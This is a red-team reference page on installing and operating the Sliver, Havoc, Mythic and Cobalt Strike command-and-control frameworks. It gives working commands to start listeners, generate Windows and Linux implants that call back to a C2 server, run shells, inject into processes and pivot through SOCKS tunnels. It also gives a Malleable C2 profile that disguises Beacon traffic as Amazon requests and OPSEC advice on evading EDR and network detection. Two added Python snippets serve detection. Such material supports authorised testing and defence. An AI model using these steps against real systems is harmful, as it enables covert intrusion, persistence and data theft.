C2 Framework Setup
#Overview
Command and Control (C2) frameworks manage implants, orchestrate post-exploitation, and maintain persistent access. This section covers setup and operation of four major C2 frameworks used in red team engagements.
#Framework Comparison
| Feature | Sliver | Havoc | Mythic | Cobalt Strike |
|---|---|---|---|---|
| License | Open source | Open source | Open source | Commercial |
| Cost | Free | Free | Free | $3,500+/yr per user |
| Language | Go | Go (teamserver), C++/Qt (client), C (Demon agent) | Go server in Docker; agents vary by project | Java (teamserver/client), C (Beacon) |
| Implants | Windows, Linux, macOS | Windows (Demon) | Multiple agents (Apollo, Poseidon, ...) | Windows (Beacon) |
| Protocol | mTLS, WireGuard, HTTP(S), DNS | HTTP(S), SMB | Per installed C2 profile: HTTP(S), TCP, ... | HTTP(S), SMB, DNS, TCP |
| UI | CLI | Qt GUI | Web | Java GUI |
| WireGuard | Built-in | No | No | No |
#Sliver
Sliver is an open-source C2 framework from Bishop Fox with a Go teamserver and cross-platform implants. Its distinguishing transport is a built-in WireGuard channel; it also speaks mTLS, HTTP(S) and DNS, which is why it is a common backbone for red team infrastructure.
#Installation
# One-line installer: installs sliver-server and sliver-client and a systemd unit that runs the server in daemon mode.
# Read the script before piping it into a root shell; for engagement infrastructure download the release binaries from GitHub instead.
curl https://sliver.sh/install | sudo bash
# Interactive server console (stop the installer's systemd service first; the console and the daemon cannot share the same ports)
sudo sliver-server
# In the server console: start the operator (multiplayer) listener, default TCP 31337, then create an operator config
[server] sliver > multiplayer
[server] sliver > new-operator --name you --lhost <server_ip>
# This writes you_<server_ip>.cfg. It holds the operator's client certificate and private key: treat it like an SSH key.
# On your operator machine:
sliver-client import ./you_<server_ip>.cfg
sliver-client
#Listeners
# Start a mutual TLS (mTLS) listener
sliver > mtls --lhost 0.0.0.0 --lport 4444
# Start an HTTPS listener
sliver > https --lhost 0.0.0.0 --lport 443 --domain c2.example.com --cert /tmp/cert.pem --key /tmp/key.pem
# Start a DNS listener
sliver > dns --lhost 0.0.0.0 --lport 53 --domains c2.example.com
# Start a WireGuard C2 tunnel
sliver > wg --lhost 0.0.0.0 --lport 51820
#Implant Generation
# generate builds a stageless implant: the whole implant is in the binary and no staging server is needed
# Windows session implant over mTLS
sliver > generate --mtls <server_ip>:4444 --os windows --arch 64bit --format exe --save /tmp/
# Linux implant (formats are exe, shared, service and shellcode; "exe" is a native executable, so an ELF on Linux)
sliver > generate --mtls <server_ip>:4444 --os linux --arch 64bit --format exe --save /tmp/
# Beacon-mode implant: checks in every 60 s plus up to 15 s of jitter instead of holding a session open (far quieter on the wire)
sliver > generate beacon --mtls <server_ip>:4444 --seconds 60 --jitter 15 --os windows --arch 64bit --format exe --save /tmp/
# --skip-symbols only skips symbol obfuscation for a faster compile; it has nothing to do with staging.
# Use it for lab builds, not for engagement payloads: unobfuscated symbols make the binary easy to fingerprint.
sliver > generate --mtls <server_ip>:4444 --os windows --arch 64bit --format exe --save /tmp/ --skip-symbols
# Staged delivery is a separate workflow (profiles new, stage-listener, generate stager; see Payload Staging)
# Generate with HTTP(S) callback
sliver > generate --https <server_ip>:443 --os windows --arch 64bit --format exe --save /tmp/
# Generate with DNS callback
sliver > generate --dns c2.example.com --os windows --arch 64bit --format exe --save /tmp/
# Generate with WireGuard (the implant carries its own userspace WireGuard stack)
sliver > generate --wg <server_ip>:51820 --os windows --arch 64bit --format exe --save /tmp/
#Session Management
# List active sessions (beacon-mode implants are listed by `beacons`; their tasks queue until the next check-in)
sliver > sessions
# Interact with a session
sliver > use <session_id>
# In a session:
sliver (SESSION) > shell                        # Interactive shell: spawns a real cmd.exe/bash child process, noisy; prefer execute
sliver (SESSION) > execute -o <command> [args]  # Run a program; -o captures its output
sliver (SESSION) > upload <local> <remote>      # Upload file
sliver (SESSION) > download <remote> [local]    # Download file
sliver (SESSION) > ps                           # List processes
sliver (SESSION) > migrate <pid>                # Inject the implant into another process
sliver (SESSION) > getuid                       # Current user
sliver (SESSION) > ifconfig                     # Network interfaces
sliver (SESSION) > background                   # Return to the main prompt without killing the session
#WireGuard C2 Tunnel
Sliver's distinguishing transport: the implant carries a userspace WireGuard stack (wireguard-go with a netstack), so no TUN interface is created on the target and no kernel driver is needed. The tunnel runs between the implant and the server; it is not a route into the target's LAN. You reach that LAN through the port forwards and the SOCKS proxy the implant exposes on its tunnel address.
# Start WireGuard listener
sliver > wg --lhost 0.0.0.0 --lport 51820
# Generate WireGuard implant
sliver > generate --wg <server_ip>:51820 --os windows --arch 64bit --format exe --save /tmp/
# Operator side: export a WireGuard client config for the server's wg listener
sliver > wg-config --save ./wg0.conf
# Bring the tunnel up on the operator machine (or a jump host)
sudo wg-quick up ./wg0.conf
# Inside the session: expose a target-side service on the implant's tunnel IP, or start a SOCKS5 proxy there
sliver (SESSION) > wg-portfwd add --remote 172.16.0.10:3389
sliver (SESSION) > wg-socks start
# Route tools through the SOCKS endpoint printed by wg-socks (ICMP sweeps such as nmap -sn do not traverse SOCKS; use connect scans)
proxychains nmap -sT -Pn 172.16.0.0/24
#Havoc
Havoc is an open-source C2 framework with a Go teamserver, a Qt client, and a Windows agent (Demon) written in C with a strong focus on evasion.
#Installation
# Build from source (the teamserver needs Go, the client needs Qt; see the repository README for distro packages)
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc
make
# Start the team server with a profile. Profiles are .yaotl files (HCL-like); the default is profiles/havoc.yaotl
# and it defines the operator accounts and passwords. Change those before first use.
./havoc server --profile ./profiles/havoc.yaotl -v
# Start the client (GUI) and log in with an operator from the profile
./havoc client
# If you prefer containers, build an image from the repository yourself rather than pulling an unverified third-party image
#Demon Agent
# Listeners come first: View → Listeners → Add (HTTP/HTTPS or SMB)
# Then generate a Demon agent from the client GUI:
# 1. Go to "Attack" → "Payload"
# 2. Select the "Demon" agent and the listener it should call back to
# 3. Configure sleep and jitter, sleep obfuscation technique, indirect syscalls and injection options
# 4. Select the format (Windows Exe, Windows Dll, Windows Shellcode, Windows Service Exe) and generate
# There is no headless generator flag on the havoc binary; payloads are built from the client
#Key Features
- Sleep obfuscation: encrypts the agent's memory while it sleeps (Ekko, Zilean or Foliage) so memory scanners see ciphertext
- Indirect syscalls: reaches the kernel without calling the hooked ntdll exports, so user-mode EDR hooks never see the call (it bypasses hooks rather than removing them)
- ETW patching: neutralises user-mode Event Tracing for Windows providers in the agent process
- AMSI patching: built-in AMSI bypass for in-process .NET and PowerShell execution
- Injection methods: spawn and inject, thread hijacking
#Mythic
Mythic is a Docker-based C2 framework (Go server since v3) with a web UI. Agents and C2 profiles are separate containers installed from GitHub, so one server drives Windows, Linux and macOS agents over whichever transports you install.
#Installation
# Clone Mythic
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic
# Install Docker and dependencies
sudo ./install_docker_ubuntu.sh
# Build and start Mythic (the first start builds the containers)
sudo ./mythic-cli start
# Web UI: https://localhost:7443 (keep it on localhost or behind a VPN; never expose it)
# Login: mythic_admin, password generated at install and stored in ./.env (MYTHIC_ADMIN_PASSWORD)
#Installing Agents
# Show installed agent and C2 profile containers and their state
sudo ./mythic-cli status
# Install Apollo (Windows agent, .NET)
sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo.git
# Install Poseidon (macOS/Linux agent, Go)
sudo ./mythic-cli install github https://github.com/MythicAgents/Poseidon.git
# Install a C2 profile (agents need at least one; the http profile is the usual starting point and is what sits behind a redirector)
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http.git
#Payload Generation
# In the Mythic web UI:
# 1. Go to "Create Payload"
# 2. Select the target OS and agent type (Apollo, Poseidon, ...)
# 3. Configure the C2 profile parameters:
# - Callback host: your redirector domain
# - Callback port: 443
# - Encryption key: auto-generated
# - Sleep interval: 60s with 20% jitter
# 4. Select output format: exe, shellcode, dll
# 5. Generate
#Cobalt Strike
Cobalt Strike is the commercial standard for red team operations: the most mature C2 framework, with the largest body of community tooling (Aggressor scripts, BOFs, profiles). That maturity cuts both ways: its defaults are the most heavily signatured of the four.
#Setup
# Start team server (listens on TCP 50050; firewall it so only operator or VPN addresses can reach it)
./teamserver <server_ip> <password> [C2 profile] [kill date]
# Example: the kill date makes every Beacon from this server exit after that day, a safety net for implants you lose track of
./teamserver 10.10.10.10 P@ssw0rd! ./profiles/normal.profile 2026-12-31
# Start client (Java GUI)
./cobaltstrike
# Connect to team server
# Host: 10.10.10.10
# Port: 50050
# Password: P@ssw0rd!
# User: operator1
#Malleable C2 Profile
Malleable C2 profiles control how Beacon traffic looks on the wire: URIs, headers, and the transforms that wrap session metadata and task output. Validate a profile with c2lint before loading it into the team server; a profile that lints clean but does not match the redirector's rewrite rules still breaks the channel.
# Example profile snippet (Amazon disguise)
set sleeptime "60000";     # 60 second sleep (milliseconds)
set jitter "20";           # 20% jitter
set useragent "Mozilla/5.0 ...";
http-get {
    set uri "/s/ref=lm_ss_sub_yo";
    client {
        header "Accept" "*/*";
        header "Host" "www.amazon.com";
        metadata {
            base64url;                 # encode the session metadata
            prepend "session-token=";  # make it look like a cookie value
            header "Cookie";           # and carry it in the Cookie header
        }
    }
    server {
        header "Server" "Server";
        header "X-Amz-Id-2" "...";
        output {
            print;                     # tasks go out as the raw response body
        }
    }
}
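The metadata block above is a small, reversible transform pipeline, and both sides of an engagement care about that. The following is an added example, not Cobalt Strike's code: it applies the profile's client transforms (base64url, prepend "session-token=", header "Cookie") to a metadata blob, renders the GET request a proxy would log, and runs the inverse a detection engineer would use to pull the blob back out of the cookie. The metadata bytes and the User-Agent string are constructed stand-ins; real Beacon metadata is an RSA-encrypted session blob, so the recovered bytes would be opaque without the team server's key.

```python
"""Malleable C2 metadata transform, applied and inverted (added example)."""
import base64
import re
from typing import Dict, Optional

URI = "/s/ref=lm_ss_sub_yo"
HOST = "www.amazon.com"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"  # constructed stand-in for "..."
PREPEND = "session-token="


def b64url(data: bytes) -> str:
    """Malleable 'base64url': RFC 4648 URL-safe alphabet with padding removed."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Re-pad and decode what b64url() produced."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_metadata(metadata: bytes) -> Dict[str, str]:
    """client { metadata { base64url; prepend "session-token="; header "Cookie"; } }"""
    value = b64url(metadata)          # base64url;
    value = PREPEND + value           # prepend "session-token=";
    return {"Cookie": value}          # header "Cookie";


def build_get_request(metadata: bytes) -> str:
    """Render the on-the-wire GET exactly as the http-get client block describes."""
    headers = {"Accept": "*/*", "Host": HOST, "User-Agent": USER_AGENT}
    headers.update(encode_metadata(metadata))
    lines = [f"GET {URI} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n"


# Detection side: the transform is deterministic and reversible, so a proxy log
# or a PCAP hands the analyst the (still encrypted) metadata blob.
COOKIE_RE = re.compile(r"^Cookie: " + re.escape(PREPEND) + r"([A-Za-z0-9_-]+)\r?$", re.M)


def recover_metadata(raw_request: str) -> Optional[bytes]:
    """Inverse pipeline: strip the prepend, then base64url-decode the cookie value."""
    m = COOKIE_RE.search(raw_request)
    return b64url_decode(m.group(1)) if m else None


if __name__ == "__main__":
    blob = b"\x00\x00\xbe\xef" + b"constructed-beacon-metadata"  # constructed sample
    request = build_get_request(blob)
    print(request)
    assert recover_metadata(request) == blob
```

Every transform Malleable C2 offers (base64, base64url, netbios, mask, prepend, append) is invertible by design, because Beacon has to undo the server's output transforms and the server has to undo Beacon's. A profile therefore hides the channel's shape, not its content; the content is protected only by Beacon's session encryption.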
#Key Commands
beacon> link <target> [pipename]           # Connect to an SMB beacon on a host
beacon> spawn <listener>                   # Spawn a new beacon in a fresh process
beacon> shell <command>                    # Run via cmd.exe /c (spawns cmd.exe, visible to EDR; prefer run, execute-assembly or BOFs)
beacon> upload <file>                      # Upload file
beacon> download <file>                    # Download file
beacon> ps                                 # List processes
beacon> inject <pid> <x86|x64> <listener>  # Inject a beacon into an existing process (Beacon has no migrate command)
beacon> sleep <seconds> [jitter%]          # Change check-in interval and jitter
beacon> portscan <hosts> <ports>           # Port scan
beacon> socks <port>                       # SOCKS proxy
beacon> rportfwd <bind> <fwdhost> <fwdport> # Reverse port forward
#Common Pitfalls
- Team server exposure: never expose the team server directly to the internet. Put redirectors in front of every listener and firewall the operator port (50050 for Cobalt Strike, 31337 for Sliver multiplayer, 7443 for the Mythic UI) to operator addresses only.
- Default profiles: the stock Cobalt Strike profile, Sliver's default HTTP(S) settings and Havoc's default listener settings are all signatured by EDR/NDR vendors. Always run a custom profile and change default ports and URIs.
- Time and kill dates: kill dates and certificate validity windows are evaluated against the target's clock, which you do not control. Leave margin on both ends and never let a listener certificate expire mid-engagement.
- Certificate management: an HTTPS listener that faces the target should present a certificate a browser would accept (Let's Encrypt or another public CA); self-signed certificates with default subjects are trivially fingerprinted. mTLS between Sliver implants and the server is a different channel and uses Sliver's own CA by design.
- Beacon timing: fixed beacon intervals stand out as a metronome in proxy logs. Use jitter, and enough of it to matter.
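What "enough jitter to matter" means is easier to see with numbers. The following is an added example, not part of any framework above: it builds constructed proxy log lines for one client polling one URI, computes the inter-arrival times and their coefficient of variation (CV = standard deviation / mean), and flags a near-zero CV as beaconing. Jitter is modelled the Cobalt Strike way (sleep shortened by a random 0 to jitter percent). The log format, IP addresses and URI are constructed; adapt LOG_RE to the proxy you actually have.

```python
"""Beacon interval detection over constructed proxy log lines (added example)."""
import random
import re
import statistics
from datetime import datetime, timedelta
from typing import List, Optional

# constructed log format: "<date> <time> <client_ip> GET <uri>"
LOG_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (\S+) GET (\S+)$")
CLIENT = "10.0.0.25"                 # constructed implant host
URI = "/s/ref=lm_ss_sub_yo"          # the http-get URI from the profile above


def make_log(sleep_s: float, jitter_pct: float, n: int, start: Optional[datetime] = None,
             client: str = CLIENT, uri: str = URI, seed: int = 1) -> List[str]:
    """Constructed log of n check-ins; gap = sleep * (1 - U(0,1) * jitter_pct / 100)."""
    rnd = random.Random(seed)
    t = start or datetime(2024, 1, 1, 9, 0, 0)
    lines = []
    for _ in range(n):
        lines.append(f"{t:%Y-%m-%d %H:%M:%S} {client} GET {uri}")
        t += timedelta(seconds=sleep_s * (1 - rnd.random() * jitter_pct / 100))
    return lines


def inter_arrivals(lines: List[str], client: str = CLIENT, uri: str = URI) -> List[float]:
    """Seconds between consecutive requests from one client to one URI; other traffic is ignored."""
    stamps = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m.group(2) == client and m.group(3) == uri:
            stamps.append(datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"))
    stamps.sort()
    return [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]


def beacon_score(deltas: List[float]) -> Optional[float]:
    """CV of the inter-arrival times: 0.0 is a perfect metronome. None if there is too little data."""
    if len(deltas) < 5:
        return None
    mean = statistics.mean(deltas)
    return statistics.pstdev(deltas) / mean if mean > 0 else None


def is_beaconing(lines: List[str], client: str = CLIENT, uri: str = URI,
                 cv_threshold: float = 0.1) -> bool:
    """Flag the (client, uri) pair when its check-ins are too regular to be a human."""
    score = beacon_score(inter_arrivals(lines, client, uri))
    return score is not None and score < cv_threshold


if __name__ == "__main__":
    noise = ["2024-01-01 09:00:30 10.0.0.7 GET /index.html"]  # unrelated client, must be ignored
    for jitter in (0, 20, 50):
        log = noise + make_log(60, jitter, 40)
        cv = beacon_score(inter_arrivals(log))
        print(f"jitter {jitter:>2}%: CV={cv:.3f} flagged={cv < 0.1}")
```

With a 60 s sleep the run prints a CV of 0.0 for no jitter, about 0.06 for 20% jitter, and about 0.19 for 50%. A uniform jitter of j percent only yields a CV of roughly j / (100 · √12 · (1 − j/200)), so the 20% in the profile above still looks like a metronome to a simple CV threshold; production beaconing detectors use richer dispersion and data-size statistics, but the lesson is the same: a little jitter is not enough, and long sleeps matter more than any profile cosmetics.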
#OPSEC Considerations
- Use redirectors between the target and the team server; the team server IP must never appear in target-side logs
- Separate long-haul (persistence, slow check-in) from short-haul (interactive) infrastructure and rotate the short-haul side regularly (every 48-72 hours on long engagements), so a burned domain does not take persistence with it
- Domain fronting hides the real C2 domain behind a CDN hostname, but most major CDNs have blocked it since 2018; verify the provider still permits it before building infrastructure on it
- Custom malleable C2 profiles blend Beacon traffic with legitimate web traffic
- DNS C2 generates unusual query patterns (large volumes of long, high-entropy subdomains) that DNS analytics pick up quickly; use it only as a fallback channel
- WireGuard C2 (Sliver) runs in-process in userspace, so there is no TUN interface on the target, but the WireGuard handshake has a recognizable UDP signature and egress UDP to arbitrary ports is often blocked
#Cross-References
- Redirectors & Fronting — Protect the team server with redirectors
- Payload Staging — Staged vs stageless payload delivery
- Cloud Tunnels — Cloudflare Tunnel for C2
- 10 - Persistence — C2 implant persistence